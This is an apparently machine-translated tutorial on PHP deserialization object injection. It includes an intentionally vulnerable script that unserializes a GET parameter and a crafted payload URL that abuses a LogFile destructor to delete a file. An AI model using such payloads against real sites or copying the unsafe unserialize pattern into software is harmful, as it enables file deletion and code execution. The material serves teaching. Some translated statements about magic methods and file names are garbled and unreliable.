PHP about deserialization object injection vulnerability

php object injection is a very common vulnerability. Although this type of vulnerability is somewhat difficult to exploit, it is still very dangerous. This article mainly shares with you a detailed explanation of PHP's deserialization object injection vulnerability. I hope it can help you.

Analysis

php basics

serialize converts an object into a string form, which can be used to save
unserialize turns the serialized string into a The object

php class may contain some special functions called magic functions. Magic function names start with the symbol __,
such as __construct, __destruct, __toString, __sleep, __wakeup, etc.

These functions are automatically called under certain circumstances, such as
__construct is called when an object is created,
__destruct is called when an object is destroyed,
__toString is called when an object is destroyed Used as a string.

Example

For example:

    <?php    

    class TestClass    
    {    
        public $variable = &#39;This is a string&#39;;    

        public function PrintVariable()    
        {    
            echo $this->variable . &#39;<br />&#39;;    
        }     

        public function __construct()    
        {    
            echo &#39;__construct <br />&#39;;    
        }      

        public function __destruct()    
        {    
            echo &#39;__destruct <br />&#39;;    
        }    

        public function __toString()    
        {    
            return &#39;__toString<br />&#39;;    
        }    
    }    

    $object = new TestClass();        
    $object->PrintVariable();    
    echo $object;      

    ?>

php allows you to save an object for later reuse. This process is called serialization .

Why is there a mechanism for serialization?
In the process of passing variables, it is possible to encounter the process of passing variable values ​​across script files. Just imagine, if you want to call the variables of a previous script in a script, but the previous script has been executed and all variables and contents are released, how do we do it? Do we need the previous script to continuously loop and wait for the next one? Script call? This is definitely unrealistic.

serialize and unserialize are used to solve this problem. Serialize can convert a variable into a string and save the value of the current variable during the conversion; unserialize can convert the string generated by serialize back into a variable. This perfectly solves cross-script transmission and execution.

Magic functions __construct and __destruct are automatically called when an object is created or destroyed;
__sleep magic method is called when an object is serialized;
__wakeup magic method is called when an object is reversed Called during serialization.

<?phpclass User    {    
    public $age = 0;    
    public $name = &#39;&#39;;  
    public function Printx()
    {
      echo $this->name.&#39; is &#39;.$this->age.&#39; years old.<br/>&#39;;
    }    public function __construct()    
    {    
        echo &#39;__construct<br />&#39;;    
    }    

    public function __destruct()    
    {    
        echo &#39;__destruct<br />&#39;;    
    }    

    public function __wakeup()    
    {    
        echo &#39;__wakeup<br />&#39;;    
    }    

    public function __sleep()    
    {    
        echo &#39;__sleep<br />&#39;;    

        return array(&#39;name&#39;, &#39;age&#39;);    
    }    
}$usr = new User(); 
$usr->age = 20;    
$usr->name = &#39;John&#39;;    
$usr->Printx();    
echo serialize($usr);echo &#39;<br/>&#39;;   

$str = &#39;O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John";}&#39;;  
$user2 = unserialize($str);$user2->Printx();?>

Now we understand how serialization works, but how do we take advantage of it?
There are multiple possible methods, depending on the application, available classes and magic functions.

Remember that serialized objects contain attacker-controlled object values.
You may find a class that defines __wakeup or __destruct in the web application source code. These functions will affect the web application.

For example, we might find a class that temporarily stores logs to a file. When destroyed the object may no longer need the log file and delete it. Save the following code as log.php.

<?php     //log.php     class LogFile    {    
    // log文件名    

    public $filename = &#39;error.log&#39;;    

    // 储存日志文件    

    public function LogData($text)    
    {    
        echo &#39;Log some data: &#39; . $text . &#39;<br />&#39;;    
        file_put_contents($this->filename, $text, FILE_APPEND);    
    }    

    // 删除日志文件    

    public function __destruct()    
    {    
        echo &#39;__destruct deletes "&#39; . $this->filename . &#39;" file. <br />&#39;;    
        unlink(dirname(__FILE__) . &#39;/&#39; . $this->filename);    
    }    
}    

?>

test.php Assume this is php for the user.

    <?php    
    //test.php     
    include &#39;logfile.php&#39;;    

    // ... 一些使用LogFile类的代码...    

    // 简单的类定义    

    class User    
    {    
        // 类数据    

        public $age = 0;    
        public $name = &#39;&#39;;    

        // 输出数据    

        public function PrintData()    
        {    
            echo &#39;User &#39; . $this->name . &#39; is &#39; . $this->age . &#39; years old. <br />&#39;;    
        }    
    }    

    // 重建用户输入的数据    

    $usr = unserialize($_GET[&#39;usr_serialized&#39;]);    

    ?>

123.php

<?php    
    //123.php  
    include &#39;logfile.php&#39;;    

    $obj = new LogFile();    
    $obj->filename = &#39;1.php&#39;;    

    echo serialize($obj) . &#39;<br />&#39;;    

    ?>

There is a 1.php at the beginning:

Now the user passes in a serialized string, test.php will Its deserialization,

http://127.0.0.1/test.php?usr_serialized=

O:7:%22LogFile%22:1:{s:8: %22filename%22;s:5:%221.php%22;}

As a result, during the release process, the parsed object called __destruct( of log.php ) function, deleted the file 1.php.

Utilization summary

Inject the serialization object where the variable is controllable and the unserialize operation is performed, and implement the code execution or other deceptive behavior.

Leaving aside __wakeup and __destruct, there are some very common injection points that allow you to exploit this type of vulnerability. Everything depends on the program logic.
For example, a user class defines a __toString to allow the application to output the class as a string (echo $obj), and other classes may also define a class to allow __toString to read a file. .


Other magic functions can also be used:
If the object will call a non-existent function __call will be called;
If the object attempts to access non-existent class variables __get and _ _set will be called.

But the use of this vulnerability is not limited to magic functions, the same idea can also be adopted for ordinary functions.

For example, the User class may define a get method to find and print some user data, but other classes may define a get method to obtain data from the database, which may lead to SQL injection vulnerabilities.

The set or write method will write data to any file, which can be used to obtain remote code execution.

The only technical issue is the classes available at the injection point, but some frameworks or scripts have automatic loading capabilities. The biggest problem is people: understanding the application to be able to exploit this type of vulnerability, as it can take a lot of time to read and understand the code.

related suggestion:

Detailed explanation of PHP serialization and deserialization principles

Detailed introduction of serialization and deserialization

javascript implementation json serialization and deserialization function example

The above is the detailed content of PHP about deserialization object injection vulnerability. For more information, please follow other related articles on the PHP Chinese website!